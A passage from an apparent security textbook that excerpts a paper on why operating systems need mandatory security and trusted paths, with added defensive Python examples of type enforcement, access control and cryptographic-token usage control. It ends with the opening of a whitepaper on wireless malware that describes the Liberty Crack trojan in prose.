Reviewing  the  existing  policy  against  known  Best  Practices  keeps 
the  network  up  to  date.  Also,  check  the  CERT  Web  site 
(http://www.cert.org)  for  useful  tips,  practices,  security  improve- 
ments, and  alerts  that  can  be  incorporated  into  your  security  policy. 

You  should  also  review  the  network’s  posture  in  comparison 
with  the  desired  security  posture.  An  outside  firm  that  specialises 
in  security  can  attempt  to  penetrate  the  network  and  test  not  only 
the  posture  of  the  network,  but  the  security  response  of  your 
organisation  as  well.  For  high-availability  networks,  it’s  recom- 
mended to  conduct  such  a test  annually. 

Finally, practice is defined as a drill or test of the support staff
to ensure that they have a clear understanding of what to do during
a security violation. Often, this drill is unannounced by
management and done in conjunction with the network posture test.
This review identifies gaps in procedures and training of personnel
so that corrective action can be taken.


IV.  The  Need  For  Secure  Operating  Systems 

Source:  “The  Inevitability  of  Failure:  The  Flawed  Assumption  of  Security  in 
Modern  Computing  Environments” 
available  at 

http://jya.com/paperF1.htm



Public  awareness  of  the  need  for  security  in  computing  systems  is 
growing  as  critical  services  are  becoming  increasingly  dependent 
on  interconnected  computing  systems.  National  infrastructure 
components  such  as  the  electric  power,  telecommunication  and 
transportation  systems  can  no  longer  function  without  networks 
of  computers.  The  advent  of  the  World  Wide  Web  has  especially 
increased  public  concern  for  security.  Security  is  the  primary  con- 
cern of  businesses  that  want  to  use  the  Internet  for  commerce  and 
maintaining  business  relationships. 

The  increased  awareness  of  the  need  for  security  has  resulted 
in  an  increase  of  efforts  to  add  security  to  computing  environ- 
ments. However,  these  efforts  suffer  from  the  flawed  assumption 
that  security  can  adequately  be  provided  in  application  space 
without  certain  security  features  in  the  operating  system.  In  real- 
ity, operating  system  security  mechanisms  play  a critical  role  in 
supporting  security  at  higher  levels.  Yet  today,  debate  persists  in 
the  research  community  as  to  what  role  operating  systems  should 
play  in  secure  systems.  The  computer  industry  has  not  accepted 
the  critical  role  of  the  operating  system  to  security,  as  evidenced 
by  the  inadequacies  of  the  basic  protection  mechanisms  provided 
by  current  mainstream  operating  systems. 

The  necessity  of  operating  system  security  to  overall  system 
security  is  undeniable;  the  underlying  operating  system  is  respon- 
sible for  protecting  application-space  mechanisms  against  tam- 
pering, bypassing,  and  spoofing  attacks.  If  it  fails  to  meet  this 
responsibility,  system-wide  vulnerabilities  will  result. 

The need for secure operating systems is especially crucial in
today’s computing environment. Substantial increases in connectivity
and data sharing have increased the risk to systems such that even
a careful and knowledgeable user running on a single-user system is
no longer safe from the threat of malicious code. Because the
distinction between data and code is vanishing, malicious code may
be introduced, without a conscious decision on the part of a user
to install executable code, whenever data is imported into the
system. For example, malicious code could be introduced with a Java
applet or by viewing apparently benign data that, in actuality,
contains executable code. More so than ever, secure operating
systems are needed to protect against this threat.

Here,  we  identify  some  features  of  secure  operating  systems 
that  are  necessary  to  protect  application-space  security  mecha- 
nisms yet  are  lacking  in  mainstream  operating  systems.  They  form 
the  ‘missing  link’  of  security.  Although  this  section  only  deals 
with  features,  it  is  important  to  note  that  features  alone  are  inad- 
equate. Assurance  evidence  must  be  provided  to  demonstrate  that 
the  features  meet  the  desired  system  security  properties  and  to 
demonstrate  that  the  features  are  implemented  correctly. 
Assurance  is  the  ultimate  missing  link;  although  approaches  to 
providing  assurance  may  be  controversial,  the  importance  of 
assurance  is  undeniable. 

Mandatory  Security 

An  operating  system’s  mandatory  security  policy  may  be  divided 
into  several  kinds  of  policies,  such  as  an  access  control  policy,  an 
authentication  usage  policy,  and  a cryptographic  usage  policy.  A 
mandatory  access  control  policy  specifies  how  subjects  may  access 
objects  under  the  control  of  the  operating  system.  A mandatory 
authentication  usage  policy  specifies  what  authentication  mecha- 
nisms must  be  used  to  authenticate  a principal  to  the  system.  A 
mandatory  cryptographic  usage  policy  specifies  what  crypto- 
graphic mechanisms  must  be  used  to  protect  data.  Additionally, 
various  subsystems  of  the  operating  system  may  have  their  own 
mechanism  usage  policies.  These  subsystem  specific  usage  policies 
may  be  dependent  on  the  cryptographic  usage  policy.  For  example, 
a network  usage  policy  for  a router  might  specify  that  sensitive 
network  traffic  should  be  protected  using  IPSEC  ESP  in  tunnelling 
mode  prior  to  being  sent  to  an  external  network.  The  selection  of 
a cryptographic  algorithm  for  IPSEC  ESP  may  be  deferred  to  the 
cryptographic  usage  policy. 

A secure system must provide a framework for defining the
operating system’s mandatory security policy and translating it to
a form interpretable by the underlying mandatory security
mechanisms of the operating system. Without such a framework, there
can be no real confidence that the mandatory security mechanisms
will provide the desired security properties. An operating system
that provides mandatory security may nonetheless suffer from the
presence of high-bandwidth covert channels. This is an issue
whenever the mandatory security policy is concerned with
confidentiality. This should not, however, be a reason to ignore
mandatory security. Even with covert channels, an operating system
with basic mandatory controls improves security by increasing the
required sophistication of the adversary.

Once  systems  with  basic  mandatory  controls  become  main- 
stream, covert  channel  exploitation  will  become  more  common 
and  public  awareness  of  the  need  to  address  covert  channels  in 
computing  systems  will  increase. 

In  any  system  that  supports  mandatory  security,  some  applica- 
tions require  special  privileges  in  the  mandatory  policy  in  order  to 
perform  some  security-relevant  function.  Such  applications  are 
frequently  called  trusted  applications  because  they  are  trusted  to 
correctly  perform  some  security-related  function  and  because  they 
are  trusted  to  not  misuse  privileges  required  in  order  to  perform 
that  function.  If  the  mandatory  security  mechanisms  of  a secure 
operating  system  only  support  coarse-grained  privileges,  then  the 
security  of  the  overall  system  may  devolve  to  the  security  of  the 
trusted  applications  on  the  system.  To  reduce  the  dependency  on 
trusted  applications,  the  mandatory  security  mechanisms  of  an 
operating  system  should  be  designed  to  support  the  principle  of 
least  privilege. 

Type  enforcement  is  an  example  of  a mandatory  security 
mechanism  that  may  be  used  both  to  limit  trusted  applications  to 
the  minimal  set  of  privileges  required  for  their  function  and  to 
confine  the  damage  caused  by  any  misuse  of  these  privileges. 

The mandatory security mechanisms of an operating system may be used to support security-related functionality in applications by rigorously ensuring that subsystems are unbypassable and tamperproof. For example, type enforcement may be used to implement assured pipelines to provide these properties. An assured pipeline ensures that data flowing from a designated source to a designated destination must pass through a security-related subsystem and ensures the integrity of the subsystem. Many of the security requirements of these applications may be ensured by the underlying mandatory security mechanisms of the operating system.
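The two ideas above, least privilege through explicit allow rules and an assured pipeline that data cannot route around, can be made concrete with a small policy evaluator. The following is an added example written for this book, not code from the paper or from any real type-enforcement system; the domain names (mta_d, scanner_d, user_d), the type names (raw_mail_t, clean_mail_t) and the rules are constructed. It derives the information flows a policy permits and checks that every flow from the raw-mail type to the user domain passes through the scanner domain, then shows how one over-broad rule for a "trusted" application breaks that guarantee.

```python
"""Toy type-enforcement (TE) policy with an assured-pipeline check.

Added illustration, not code from the paper or from any real TE
implementation. Domains (mta_d, scanner_d, user_d), types (raw_mail_t,
clean_mail_t) and the rules below are constructed for this example.
"""
from collections import defaultdict


class TEPolicy:
    """Default-deny: a (domain, type) pair holds only the permissions an
    explicit allow rule grants, which is the least-privilege property the
    text asks for: a trusted subsystem gets its minimal set and nothing more."""

    def __init__(self):
        self.rules = defaultdict(set)  # (domain, type) -> {perm, ...}

    def allow(self, domain, obj_type, *perms):
        self.rules[(domain, obj_type)].update(perms)
        return self

    def permitted(self, domain, obj_type, perm):
        return perm in self.rules.get((domain, obj_type), set())

    def flow_graph(self):
        """Information-flow edges implied by the policy: a 'read' rule lets
        data flow from the type into the domain, a 'write' rule from the
        domain into the type."""
        graph = defaultdict(set)
        for (domain, obj_type), perms in self.rules.items():
            if "read" in perms:
                graph[("type", obj_type)].add(("domain", domain))
            if "write" in perms:
                graph[("domain", domain)].add(("type", obj_type))
        return graph

    def flows(self, src_type, dst_domain):
        """All simple paths by which data of src_type can reach dst_domain."""
        graph = self.flow_graph()

        def walk(node, path):
            path = path + [node]
            if node == ("domain", dst_domain):
                yield path
                return
            for nxt in graph.get(node, ()):
                if nxt not in path:
                    yield from walk(nxt, path)

        return list(walk(("type", src_type), []))

    def assured_pipeline(self, src_type, dst_domain, via_domain):
        """True when every permitted flow from src_type to dst_domain passes
        through via_domain, i.e. that subsystem is unbypassable for the data."""
        paths = self.flows(src_type, dst_domain)
        return bool(paths) and all(("domain", via_domain) in p for p in paths)


def mail_policy():
    """Constructed policy: incoming mail must pass the scanner before any
    user domain can read it, and nobody but the scanner may produce clean mail."""
    return (
        TEPolicy()
        .allow("mta_d", "raw_mail_t", "write")        # MTA may only deposit raw mail
        .allow("scanner_d", "raw_mail_t", "read")     # scanner consumes raw mail ...
        .allow("scanner_d", "clean_mail_t", "write")  # ... and emits clean mail
        .allow("user_d", "clean_mail_t", "read")      # users read clean mail only
    )


if __name__ == "__main__":
    policy = mail_policy()
    print("scanner unbypassable:",
          policy.assured_pipeline("raw_mail_t", "user_d", "scanner_d"))
    # One extra rule (a 'trusted' application granted too much) breaks the pipeline.
    policy.allow("user_d", "raw_mail_t", "read")
    print("after the extra rule:",
          policy.assured_pipeline("raw_mail_t", "user_d", "scanner_d"))
```

The tamperproof half of the property falls out of default deny: no rule lets user_d or mta_d write clean_mail_t, so the scanner's output cannot be forged. Real type enforcement policies are checked by the kernel on every access; the flow-graph walk here is the kind of offline analysis an administrator would run over a policy before loading it.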

Operating system mandatory security mechanisms may also be used to rigorously confine an application to a unique security domain that is strongly separated from other domains in the system. Applications may still misbehave, but the resulting damage can now be restricted to within a single security domain. This confinement property is critical to controlling data flows in support of a system security policy. In addition to supporting the safe execution of untrustworthy software, confinement may support functional requirements, such as an isolated testing environment in an insulated development environment.

Although one could attempt to enforce a mandatory security policy through discretionary security mechanisms, such mechanisms cannot defend against careless or malicious users. Since discretionary security mechanisms place the burden for security on the individual users, carelessness by any one user at any point in time may lead to a violation of the mandatory policy. In contrast, mandatory security mechanisms limit the burden to the system security policy administrator. With only discretionary mechanisms, a malicious user with access to sensitive data and applications may directly release sensitive information in violation of the mandatory policy. Although that same user may also be able to leak sensitive information in ways that do not involve the computing system, the ability to leak the information through the computing system may increase the bandwidth of the leak and may decrease its traceability. In contrast, with mandatory security mechanisms, he may only leak sensitive information through covert channels, which limits the bandwidth and increases accountability, if covert channels are audited.
Furthermore, even with users who are benign and careful, the mandatory security policy may still be subverted by flawed or malicious applications when only discretionary mechanisms are used to enforce it. The distinction between flawed and malicious software is not particularly important in this paper. In either case, an application may fail to apply security mechanisms required by the mandatory policy or may use security mechanisms in a way that is inconsistent with the user’s intent. Mandatory security mechanisms may be used to ensure that security mechanisms are applied as required and can protect the user against inadvertent execution of untrustworthy applications.

Although the user may have carefully defined the discretionary policy to properly implement the mandatory policy, an application may change the discretionary policy without the user’s approval or knowledge. In contrast, the mandatory policy may only be changed by the system security policy administrator.

In the case of personal computing systems, where the user may be the system security policy administrator, mandatory security mechanisms are still helpful in protecting against flawed or malicious software. In the simplest case, where there is only a distinction between the user’s ordinary role and the user’s role as system security policy administrator, the mandatory security mechanisms can protect the user against unintentional execution of untrustworthy software. With a further subdivision of the user’s ordinary role into various roles based on function, mandatory security mechanisms can confine the damage that may be caused by flawed or malicious software.

Although there are a number of commercial operating systems with support for mandatory security, none of these systems have become mainstream. These systems have suffered from a fixed notion of mandatory security, thereby limiting their market appeal. Furthermore, these systems typically lack adequate support for constraining trusted applications. In order to reach a wider market, operating systems must support a more general notion of mandatory security and must support flexible configuration of mandatory policies.

Mainstream commercial operating systems rarely support the principle of least privilege even in their discretionary access control architecture. Many operating systems only provide a distinction between a completely privileged security domain and a completely unprivileged security domain. Even in Microsoft Windows NT, the privilege mechanism fails to adequately protect against malicious programs because it does not limit the privileges that a program inherits from the invoking process based on the trustworthiness of the program.

Current microkernel-based research operating systems have tended to focus on providing primitive protection mechanisms which may be used to flexibly construct a higher-level security architecture. Many of these systems use kernel-managed capabilities as the underlying protection mechanism. However, typical capability architectures are inadequate for supporting mandatory access controls with a high degree of flexibility and assurance. Flask, a variant of the Fluke microkernel, provides a mandatory security framework similar to that of DTOS, a variant of the Mach microkernel; both systems provide mechanisms for mandatory access control and a mandatory policy framework.

Trusted Paths

A trusted path is a mechanism by which a user may directly interact with trusted software, which can only be activated by either the user or the trusted software and may not be imitated by other software. In the absence of a trusted path mechanism, malicious software may impersonate trusted software to the user or may impersonate the user to trusted software. Such malicious software could potentially obtain sensitive information, perform functions on behalf of the user in violation of the user’s intent, or trick the user into believing that a function has been invoked without actually invoking it. In addition to supporting trusted software in the base system, the trusted path mechanism should be extensible to support the subsequent addition of trusted applications by a system security policy administrator.

The concept of a trusted path can be generalised to include interactions beyond just those between trusted software and users. The TNI introduces the concept of a trusted channel for communication between trusted software on different network components. More generally, a mechanism that guarantees a mutually authenticated channel, or protected path, is necessary to ensure that critical system functions are not being spoofed. Although a protected path mechanism for local communications could be constructed in application space without direct authentication support in the operating system, it is preferable for an operating system to provide its own protected path mechanism since such a mechanism will be simpler to assure and is likely to be more efficient.

Most mainstream commercial operating systems are utterly lacking in their support for either a trusted path mechanism or a protected path mechanism. Microsoft Windows NT does provide a trusted path for a small set of functions such as login authentication and password changing but lacks support for extending the trusted path mechanism to other trusted applications. For local communications, NT does provide servers with the identity of their clients; however, it does not provide the server identity to the client.

General Examples

Without operating system support for mandatory security and trusted path, application space mechanisms for access control and cryptography cannot be implemented securely.

Access Control: An application-space access control mechanism may be decomposed into an enforcer component and a decider component. When a subject attempts to access an object protected by the mechanism, the enforcer component must invoke the decider component, supplying it with the proper input parameters for the policy decision, and must enforce the returned decision. A common example of the required input parameters is the security attributes of the subject and the object. The decider component may also consult other external sources in order to make the policy decision. For example, it may use an external policy database and system information such as the current time. If a malicious agent can tamper with any of the components in the access control mechanism or with any inputs to the decision, then the malicious agent can subvert the access control mechanism. Even if the components and all of the inputs are collocated within a single file, the operating system security mechanisms are still relied upon to protect the integrity of that file. As discussed, only mandatory security mechanisms can rigorously provide such integrity guarantees.

Even with strong integrity guarantees for the policy decision inputs, if an authorised user invokes malicious software, the malicious software could change an object’s security attributes or the policy database’s rules without the user’s knowledge or consent. The access control mechanism requires a trusted path mechanism in the operating system in order to ensure that arbitrary propagation of access cannot occur without explicit authorisation by a user.

If a malicious agent can impersonate the decider component to the enforcer component, or if a malicious agent can impersonate any source of inputs to the decision, then the malicious agent can subvert the mechanism. If any of the components or external decision input sources are not collocated within a single application, then the access control mechanism requires a protected path mechanism. If a malicious agent can bypass the enforcer component, then it may trivially subvert the access control mechanism. Mandatory security mechanisms in the operating system may be used to ensure that all accesses to the protected objects are mediated by the enforcer component.
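The enforcer/decider decomposition of the last three paragraphs, together with the dependence on the integrity of the decision inputs, is shown in the following added example. It is written for this book and is not code from the paper: the roles, labels, policy table and timestamps are constructed, and the HMAC key that seals each object’s security attributes stands in for the integrity protection the text says must ultimately come from the operating system. The decider consumes subject attributes, sealed object attributes, a policy database and the current time; the enforcer owns the objects and mediates every read and write; relabelling an object behind the mechanism’s back is caught by the seal rather than silently granting access.

```python
"""Enforcer/decider decomposition of an application-space access control
mechanism, with integrity-sealed decision inputs.

Added illustration, not code from the paper. Roles, labels and the policy
table are constructed. The HMAC key stands in for integrity protection the
mechanism must borrow from the operating system: whoever can read or change
that key (or the store behind the enforcer) owns the decision.
"""
import hashlib
import hmac
import json
from datetime import datetime


class IntegrityError(Exception):
    """A decision input (an object's security attributes) was modified
    outside the mechanism, so no decision about it can be trusted."""


class Decider:
    """Policy decision point. Inputs: subject attributes, sealed object
    attributes, the policy database and an external input (current time)."""

    def __init__(self, policy, integrity_key):
        self.policy = policy          # (role, label) -> {perm, ...}
        self._key = integrity_key

    def seal(self, attrs):
        body = json.dumps(attrs, sort_keys=True).encode()
        tag = hmac.new(self._key, body, hashlib.sha256).hexdigest()
        return body, tag

    def unseal(self, sealed):
        body, tag = sealed
        expected = hmac.new(self._key, body, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(tag, expected):
            raise IntegrityError("object attributes failed integrity check")
        return json.loads(body)

    def decide(self, subject, sealed_attrs, perm, now):
        obj = self.unseal(sealed_attrs)
        allowed = self.policy.get((subject["role"], obj["label"]), set())
        # Constructed rule that depends on an external input: no writes outside 08:00-18:00.
        if perm == "write" and not 8 <= now.hour < 18:
            return False
        return perm in allowed


class Enforcer:
    """Policy enforcement point. It owns the objects, so every access must
    pass through read()/write(); anything that could reach _store directly
    would bypass the mechanism, which only OS-level controls can prevent."""

    def __init__(self, decider):
        self._decider = decider
        self._store = {}              # name -> [sealed_attrs, contents]

    def create(self, name, label, contents):
        self._store[name] = [self._decider.seal({"label": label}), contents]

    def read(self, subject, name, now):
        sealed, contents = self._store[name]
        if not self._decider.decide(subject, sealed, "read", now):
            raise PermissionError(f"{subject['name']} may not read {name}")
        return contents

    def write(self, subject, name, contents, now):
        sealed, _ = self._store[name]
        if not self._decider.decide(subject, sealed, "write", now):
            raise PermissionError(f"{subject['name']} may not write {name}")
        self._store[name][1] = contents

    def tamper_label(self, name, new_label):
        """Simulates an attribute file edited behind the mechanism's back:
        the label changes but the seal is not recomputed."""
        body, tag = self._store[name][0]
        attrs = json.loads(body)
        attrs["label"] = new_label
        self._store[name][0] = (json.dumps(attrs, sort_keys=True).encode(), tag)


def _raises(exc, fn):
    try:
        fn()
    except exc:
        return True
    return False


def demo():
    """Runs the scenarios from the text and returns their outcomes."""
    policy = {("analyst", "public"): {"read"},
              ("admin", "internal"): {"read", "write"}}
    enforcer = Enforcer(Decider(policy, b"constructed-demo-key"))
    enforcer.create("report", "internal", "quarterly numbers")
    analyst = {"name": "alice", "role": "analyst"}
    admin = {"name": "root", "role": "admin"}
    day = datetime(2000, 6, 6, 10, 0)
    night = datetime(2000, 6, 6, 23, 0)
    out = {
        "admin_reads": enforcer.read(admin, "report", day),
        "analyst_denied": _raises(PermissionError, lambda: enforcer.read(analyst, "report", day)),
        "night_write_denied": _raises(PermissionError, lambda: enforcer.write(admin, "report", "x", night)),
    }
    # Relabel 'report' as public without going through the decider: the policy
    # would now grant the analyst access, but the seal no longer matches.
    enforcer.tamper_label("report", "public")
    out["tamper_detected"] = _raises(IntegrityError, lambda: enforcer.read(analyst, "report", day))
    return out


if __name__ == "__main__":
    for scenario, result in demo().items():
        print(f"{scenario}: {result}")
```

Note what the seal does and does not buy: it detects modification of an input, which is the first vulnerability the text names, but it does nothing against an agent that can call the decider with a forged subject, impersonate the decider to the enforcer, or reach the store without the enforcer. Those are exactly the gaps the text assigns to protected path and mandatory security in the operating system.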

Cryptography: An analysis of application-space cryptography may be decomposed into an analysis of the invocation of the cryptographic mechanism and an analysis of the cryptographic mechanism itself. As an initial basis for discussion, suppose that the cryptographic mechanism is a hardware token that implements the necessary cryptographic functions correctly and that there is a secure means by which the cryptographic keys are established in the token. Even in this simplified case, where the confidentiality and integrity of algorithms and keys is achieved without operating system support, we will demonstrate that there are still vulnerabilities which may only be effectively addressed with the features of a secure operating system.

One vulnerability in this simplified case is that invocation of the token cannot be guaranteed. Any legitimate attempt to use the token might not result in a call to the token. The application that performs the cryptographic invocation might be bypassed or modified by malicious applications or malicious users. Malicious applications might impersonate the cryptographic token to the invoking application. Mandatory security and protected path features in the operating system address this vulnerability. Mandatory security mechanisms may be used to ensure that the application that invokes the cryptographic token is unbypassable and tamperproof against both malicious software and malicious users. Unbypassability could also be achieved by using an inline cryptographic token, which is physically interposed between the sender of the data to be protected and the receiver of the protected data; however, this would be less flexible. A protected path mechanism may be used to ensure that malicious software cannot impersonate the cryptographic token to the invoking application.

Misuse of the cryptographic token is a second vulnerability in the simplified case. Misuse may involve the use of a service, algorithm, session or key by an unauthorised application. Without operating system support for identifying callers, a cryptographic token can do little more than require that a user activate it, after which any service, algorithm, session or key authorised for that user may be used by any application on the system. In this case, the cryptographic token may be misused by applications operating on behalf of other users or may be misused by malicious software operating on behalf of the authorised user.

Furthermore, unless the cryptographic token has a direct physical interface for user activation, malicious software can spoof the token to the user, obtain authentication information, and subsequently activate the cryptographic token without the user’s knowledge or consent. Even with a direct physical interface to the user, it is impractical for the cryptographic token to require user confirmation for every cryptographic operation.

This second vulnerability may be addressed through mandatory security, trusted path and protected path features in the operating system. A trusted path mechanism obviates the need for a separate physical interface for activation. A protected path mechanism permits the cryptographic token to identify its callers and enforce fine-grained controls over the use of services, algorithms, sessions and keys. As an alternative to having the token deal with fine-grained controls over its usage, mandatory security mechanisms may also be used to provide such controls. For example, mandatory security mechanisms may be used to isolate the token for use only by applications executed by the user who activated the token. Furthermore, the mandatory security mechanisms can reduce the risk of malicious software being able to use the cryptographic token and may consequently limit the use of the trusted path mechanism to highly sensitive actions.
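The difference a protected path makes to token misuse, as discussed in the preceding paragraphs, is easiest to see side by side. The following is an added example written for this book, not code from the paper or from any real token or operating system. The users (alice, bob), applications (mail_app, rogue_app) and key are constructed; HMAC-SHA256 stands in for the token’s signing function; and the OsChannel class models a protected path on which the operating system, not the calling application, attaches the caller’s identity to each request. The first token only knows that its owner activated it, so any application on the system can use the key; the second can bind the key to one user and one application.

```python
"""Cryptographic token usage control with and without caller identification.

Added illustration, not code from the paper or any real token. OsChannel
stands in for an OS protected path: the OS, not the application, attaches
the caller's identity. Users, application names and the key are constructed;
HMAC-SHA256 stands in for the token's signing function.
"""
import hashlib
import hmac
from collections import namedtuple

# Identity attached by the OS on a protected path; applications cannot forge it.
Caller = namedtuple("Caller", "user app")


class TokenMisuse(Exception):
    """The token refused a request its usage policy does not permit."""


class CryptoToken:
    """Keys never leave the token; it only returns signatures."""

    def __init__(self, keys, owners, authorised=None, require_caller=False):
        self._keys = keys                     # key_id -> secret bytes
        self._owners = owners                 # key_id -> user who may activate it
        self._authorised = authorised or {}   # key_id -> {app, ...} allowed to use it
        self.require_caller = require_caller  # True only when a protected path exists
        self._active_users = set()

    def activate(self, user):
        """User activation (PIN, button press, or a trusted-path dialog)."""
        self._active_users.add(user)

    def sign(self, key_id, data, caller=None):
        owner = self._owners[key_id]
        if owner not in self._active_users:
            raise TokenMisuse("key owner has not activated the token")
        if self.require_caller:
            # With a protected path the token can bind each key to the user
            # *and* the application the OS says is calling.
            if caller is None:
                raise TokenMisuse("request did not arrive over the protected path")
            if caller.user != owner or caller.app not in self._authorised.get(key_id, ()):
                raise TokenMisuse(f"{caller.app} ({caller.user}) not authorised for {key_id}")
        # Without caller identity the check above cannot exist: once the owner has
        # activated the token, any application on the system may use the key.
        return hmac.new(self._keys[key_id], data, hashlib.sha256).hexdigest()

    def verify(self, key_id, data, signature):
        expected = hmac.new(self._keys[key_id], data, hashlib.sha256).hexdigest()
        return hmac.compare_digest(signature, expected)


class OsChannel:
    """Protected path: created by the OS for one process, so the identity it
    carries is that process's real identity."""

    def __init__(self, token, caller):
        self._token = token
        self._caller = caller

    def sign(self, key_id, data):
        return self._token.sign(key_id, data, caller=self._caller)


def _raises(exc, fn):
    try:
        fn()
    except exc:
        return True
    return False


def demo():
    """Per scenario: True if the token refused, or if a legitimate signature verifies."""
    keys = {"alice-mail-key": b"constructed-secret-material"}
    owners = {"alice-mail-key": "alice"}
    msg = b"approve payment 42"
    out = {}

    # 1. Token on an OS with no protected path: it only knows a user activated it.
    legacy = CryptoToken(keys, owners)
    legacy.activate("alice")
    out["legacy_mail_app_ok"] = legacy.verify("alice-mail-key", msg, legacy.sign("alice-mail-key", msg))
    out["legacy_rogue_refused"] = _raises(TokenMisuse, lambda: legacy.sign("alice-mail-key", msg))

    # 2. Same token behind an OS protected path, key bound to alice's mail_app.
    strict = CryptoToken(keys, owners, {"alice-mail-key": {"mail_app"}}, require_caller=True)
    strict.activate("alice")
    mail = OsChannel(strict, Caller("alice", "mail_app"))
    rogue = OsChannel(strict, Caller("alice", "rogue_app"))   # untrusted code running as alice
    bobs_mail = OsChannel(strict, Caller("bob", "mail_app"))  # another user's process
    out["strict_mail_app_ok"] = strict.verify("alice-mail-key", msg, mail.sign("alice-mail-key", msg))
    out["strict_rogue_refused"] = _raises(TokenMisuse, lambda: rogue.sign("alice-mail-key", msg))
    out["strict_other_user_refused"] = _raises(TokenMisuse, lambda: bobs_mail.sign("alice-mail-key", msg))
    out["strict_bypass_refused"] = _raises(TokenMisuse, lambda: strict.sign("alice-mail-key", msg))
    return out
```

In demo(), legacy_rogue_refused comes back False: the legacy token signs for rogue_app because, as the text says, it can do no better than require that a user activate it. The strict token refuses the rogue application, another user’s process, and any request that did not come over the channel. The text’s alternative, having mandatory security confine the token to the activating user’s applications, would make the same decision one layer lower, in the operating system, and remove the per-key policy from the token altogether.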

Hence, even in the simplest case, the features of a secure operating system are crucial to addressing the vulnerabilities of application-space cryptography. In the remainder of this section, the assumptions of the simplified case are removed, and the additional vulnerabilities are examined.

If the assumption that initial keys are securely established within the token is removed, then there is the additional vulnerability that the initial keys may be observed or modified by an unauthorised entity. Unless the initial keys are provided via a dedicated physical interface to the cryptographic token, the operating system must protect the path between the initial key source and the cryptographic token and may need to protect the initial key source itself. Mandatory security mechanisms may be used to rigorously protect the path and the key source. A trusted path may be required for initial keying.

If the assumption that the cryptographic mechanism is confined to a single hardware token is removed and implemented in software instead, the confidentiality and integrity of the cryptographic mechanism’s code and data becomes dependent on the operating system, including both memory protection and file protection. Mandatory security is needed to rigorously ensure the mechanism’s integrity and confidentiality. If any external inputs, such as input parameters to a random number generator, are used by the cryptographic mechanism, the input sources and the path between the input sources and the cryptographic mechanism must be protected with mandatory security mechanisms.

System Security: No single technical security solution can provide total system security; a proper balance of security mechanisms must be achieved. Each security mechanism provides specific security functions and should be designed to only provide those functions. It should rely on other mechanisms for support and for required security services. In a secure system, the entire set of mechanisms complement each other so that they collectively provide a complete security package. Systems that fail to achieve this balance will be vulnerable.

A secure operating system is an important and necessary piece to the total system security puzzle, but it is not the only piece. A highly secure operating system would be insufficient without application-specific security built upon it. Certain problems are actually better addressed by security implemented above the operating system. One such example is an electronic commerce system that requires a digital signature on each transaction. An application-space cryptographic mechanism in the transaction system protected by secure operating system features might offer the best system security solution.

No single security mechanism is likely to provide complete protection. Unsolved technical problems, implementation errors and flawed environmental assumptions will result in residual vulnerabilities. As an example, covert channels remain a serious technical challenge for secure operating system designers. These limitations must be understood, and suitable measures must be taken to deploy complementary mechanisms designed to compensate for such problems. In the covert channel example, auditing and detection mechanisms should be utilised to minimise the chances that known channels are exploited. In turn, these should depend on secure operating systems to protect their critical components, such as audit logs and intrusion sensors, because they are subject to the same types of vulnerabilities as those discussed elsewhere here.

Virus And Malicious Code Protection For Wireless Devices

Source: “Virus and Malicious Code Protection for Wireless Devices” available at

http://download.antivirus.com/ftp/white/wireless_protection02280l.doc

Although malicious code has yet to cause serious damage or incur substantial costs in the wireless arena, such code seen in the lab and, in some cases, in the real world, has indicated that this undesirable code has the potential for serious disruption to the wireless infrastructure. As the line between cellular phones and personal digital assistants blurs, the enhanced functionality of the wireless devices that emerge offers a playground for hackers and e-vandals—in much the same way that each new medium emerging in the last two decades has offered such an opportunity.

The world is going mobile. While the lack of affordable mobile phone service is a fairly recent memory for many consumers, today, most consumers take for granted the ability to communicate with friends and family anywhere, anytime, at a reasonable cost. At the same time, mobility is the watchword today in business. Global prosperity and an even faster pace of business are driving the desire for employees, partners, and customers to be able to communicate, without regard for location.

Yet increasingly today, mobility has a different face. The ability to transmit and receive wireless data is enabling an entirely new type of business. M-commerce, perhaps initially visualised by many as the teenager purchasing a soda using a cell phone in a recent television commercial, is becoming the new way to purchase goods and services, transfer funds, and perform other types of wireless transactions.

The migration from simple voice communication to data communication is underway in earnest. According to Cahners In-Stat Group, the most successful wireless data system is the short message service (SMS) on Global System for Mobile Communications (GSM) networks. Cahners points out that in a single month early this year, users sent 8 billion SMS messages worldwide. Interestingly, for many users in some parts of the world (including, most notably, Japan), the wireless device is the most prevalent mode of accessing the Internet, compared to PC Internet access. More than 200 million SMS subscribers already dot the globe, and Cahners projected 742 million worldwide wireless Internet subscribers in 2004 and 607 million SMS subscribers in the same year.

Overview of Threats and Potential Damage

Yet, like each new communication and computing medium before it, wireless voice and data communication presents the opportunity for less desirable applications. The rapid spread of wireless communications presents new opportunities for hackers, disgruntled employees, and others to prove their prowess in spreading viruses and malicious code.

On the surface, the vulnerability of wireless devices to viruses and malicious code threats appears to follow the same patterns of vulnerabilities that the wired world has experienced. Yet, upon closer inspection, the vulnerabilities are more numerous and complex. Such threats can be categorised into three groups:

o Application-based threats
o Content-based threats
o Mixed threats (a power-packed combination of application and content-based threats not yet seen in the real world)

Application-based Threats

In the wireless world, application-based threats are posed by executable malicious code that latches on to existing, or new, wireless applications. Application-based threats are potentially present anytime a software program is downloaded to, or executed on, a wireless device, particularly when the program is downloaded or received from an unknown source. In the wired world, these threats are roughly analogous to the early viruses borne by executable programs (which were later superseded by the rise in Macro viruses—malicious code borne by non-executable files).

The first malicious application-based program that specifically targeted the Palm operating system (OS) used in Palm Pilot personal digital assistants (PDAs) was called ‘Liberty Crack’. The free software, which could be downloaded from a Web site or accessed via Internet relay chat (IRC) rooms, pretended to convert the shareware Liberty Game Boy program into a registered version. When the program was executed, the user was not aware that, in the background, the program was deleting all executable applications in the handheld device. Liberty Crack did not affect the underlying Palm operating system or the embedded applications.

Liberty Crack and similar ‘Trojan horses’ are likely to spread very slowly ‘in the wild’ (i.e., in the real world) and represent a relatively low threat. Liberty Crack is designated a Trojan horse as it masquerades with one purpose, while harbouring a surprise purpose (similar to the Trojan horse of ancient Greece in which soldiers hid inside a hollow wooden horse presented as a gift by the Trojans).

While actual incidences of Liberty Crack have not been encountered in the wild, this Trojan horse is significant in its proof of concept—demonstrating that malicious code can be downloaded and may adversely impact PDAs. Many analysts have labelled Liberty Crack, which first made news in late August 2000, as a harbinger of more malicious code to come. For example, future wireless Trojans could steal data such as address book information, portal passwords, and other confidential information.

